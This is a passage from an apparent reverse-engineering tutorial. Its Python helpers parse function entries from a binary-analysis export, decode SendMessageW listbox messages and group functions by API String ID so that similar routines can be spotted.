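        e["strings"] = e["String ID"].split("$") if "String ID" in e else []
    return entries


def direct_calls(entry):
    """API names the function calls itself (subcall lines excluded)."""
    return [a["func"] for a in entry["apis"] if not a["subcall"]]


def decode_sendmessage(entry):
    """Resolve the Msg argument of each direct SendMessageW call to its LB_* name."""
    out = []
    for a in entry["apis"]:
        if a["func"] == "SendMessageW" and not a["subcall"] and len(a["args"]) >= 2:
            msg = int(a["args"][1], 16)
            out.append((a["ref"], LB_MESSAGES.get(msg, f"0x{msg:04X}")))
    return out


def group_by_api_string_id(entries):
    """Pivot: functions sharing an API String ID are candidates for the same runtime routine."""
    groups = defaultdict(list)
    for e in entries:
        groups[e.get("API String ID")].append(e["Opcode ID"])
    return dict(groups)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in parsed:
        print(e["API ID"], direct_calls(e), e["strings"], decode_sendmessage(e))
    print(group_by_api_string_id(parsed))
```

Two entries above share `API String ID 372448540-1403004172` but carry different Opcode IDs: same API set and strings, different code. Grouping on the API String ID first and then comparing Opcode IDs is the cheap way to spot that before reaching for the fuzzy hashes.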